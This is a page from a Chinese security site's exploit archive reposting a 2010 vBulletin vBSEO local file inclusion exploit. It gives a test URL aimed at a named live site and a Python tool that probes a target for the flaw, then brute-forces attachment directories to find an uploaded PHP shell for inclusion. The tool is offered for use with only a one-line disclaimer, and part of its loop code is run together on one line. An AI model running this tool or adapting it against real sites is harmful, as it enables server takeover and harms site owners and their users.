首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
vBulletin vbseo.php本地文件包含漏洞
来源:vfocus.net 作者:MaXe 发布时间:2010-09-16  

测试url:

http://www.nuanyue.com/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html

Exploitation:

#!/usr/bin/python
 
#  ______          __                  __  __     __   ______
# /\__  _\        /\ \__              /\ \/\ \  /'__`\/\__  _\
# \/_/\ \/     ___\ \ ,_\    __   _ __\ \ `\\ \/\ \/\ \/_/\ \/
#    \ \ \   /' _ `\ \ \/  /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \
#     \_\ \__/\ \/\ \ \ \_/\  __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \
#     /\_____\ \_\ \_\ \__\ \____\\ \_\  \ \_\ \_\ \____/  \ \_\
#     \/_____/\/_/\/_/\/__/\/____/ \/_/   \/_/\/_/\/___/    \/_/
#      --------------------------------------------------------
#		Title:	vBSEO LFI Assistant Tool
#	       Author:	MaXe
#		 Site: 	http://www.intern0t.net
#
#	  Description: 	1) Checks whether the vBSEO installation
#			is patched or not. 2) Attempts to find
#			the physical location of an uploaded
#			attachment phile. (PHP Shell)
#
#	      Version:	2.1.4 - Reversed Algorithm - Basic Version
#
#	      License:	-- Attribution-ShareAlike 3.0 Unported --
#			http://creativecommons.org/licenses/by-sa/3.0/
#
#		Notes:	The basic version does not contain multi-
#			threading nor is it able to search through
#			multiple sub directories which the advanced
#			version will be able to.
#			Please note, that this tool does not work on
#			all types of hosts and you should therefore
#			modify this script to your own needs.
#
#	   Disclaimer:	This tool is meant for ethical purposes only.
 
# Import the appropriate libraries.
import os
import re
import httplib
import sys
 
# Clear the screen in a sufficient way.
if(os.name) == "posix":
    os.system("clear")
elif(os.name) == "nt":
    os.system("cls")
else:
    print "[!] Cannot clear screen automatically.\n"
 
print "File Finder by MaXe from InterN0T.net\n\n"
 
# Get user-input and define global variables.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
main_dir = ["attach","attachment","attachments","download"]
poss_main_dir = []
sub_dir = []
 
# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)
 
# Perform a simple LFI to check whether the target is vulnerable or not.
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()
 
# If the response code is 200 OK, check if the file really was included.
if resp.status == 200:
	print "[+] Site is responding, this is good."
	if re.search("(Enter text...)", resp.read()):
		print ">> The site appears to be vulnerable!"
	else:
		print "[!] The site appears to be patched. (unknown error)"
 
elif resp.status == 404:
	print "[!] The site appears to be patched. (404)"
 
# Search for attachment directories
for value in main_dir[0:]:
	conn = httplib.HTTPConnection(newtarget, 80)
	print "[*] Trying: http://%s/%s/" % (newtarget,value)
	conn.request("HEAD", "/%s/" % value)
	resp = conn.getresponse()
 
	# If the response code is 403 (Forbidden), set a new variable and continue.
	if resp.status == 403:
		print "[+] Directory found: /%s/" % value
 
		if poss_main_dir == []:
			poss_main_dir = ["%s" % value]
		else:
			poss_main_dir += ["%s" % value]
 
	conn.close()
 
if poss_main_dir == []:
	print "[!] No directories were found, exiting."
	sys.exit()
 
# Search for possible sub directories
for value in poss_main_dir:
 
	i = 0
	print "[*] Trying subdirs within: http://%s/%s/" % (newtarget,value)
	while i <= 9: 		conn = httplib.HTTPConnection(newtarget, 80) 		conn.request("HEAD",  "/%s/%s/" % (value,i)) 		resp = conn.getresponse() 		 		if resp.status == 403: 			print "[+] Sub Directory found: /%s/%s/" % (value,i) 			found = "%s/%s" % (value,i) 			 			if sub_dir == []: 				sub_dir = ["%s" % found] 			else: 				sub_dir += ["%s" % found] 				 		i=i+1 		conn.close() 		 if sub_dir == []: 	print "[!] No sub directories were found, exiting." 	sys.exit() # Search all the sub directories found for our phile for value in sub_dir[0:]: 	i = 99 	print "[*] Trying to find our file within: /%s/" % value 	while i >= 0:
		conn = httplib.HTTPConnection(newtarget, 80)
		conn.request("GET", "/%s/%s.attach" % (value,i))
		resp = conn.getresponse()
 
		if resp.status == 200:
			print "[+] File found, does it match our keyword? >> %s" % file_match
 
			if re.search("(%s)" % file_match, resp.read()):
				print ">> File contains our keyword!"
				print "Part URL: /%s/%s.attach" % (value,i)
				print "Full URL: http://" + newtarget + "/%s/%s.attach \n" % (value,i)
				sys.exit(0)
 
		i=i-1
		conn.close()
 
# Don't forget, that this script can be used for more than one thing.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·win32/xp sp3 (Tr) calc.exe She
·xp_hello.dll(sa) 提权工具
·win32/xp sp3 (Tr) Create New F
·win32/xp sp3 (Tr) cmd.exe Shel
·Integard Pro 2.2.0.9026 (Win7
·Chalk Creek Media Player 1.0.7
·MP3 Workstation Version 9.2.1.
·Honestech VHS to DVD <= 3.0.30
·Ipswitch Imail Server List Mai
·x86_64 Linux Kernel ia32syscal
·win32/xp sp3 (Tr) MessageBoxA
·Linux Kernel 2.6.27+ x86_64 co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved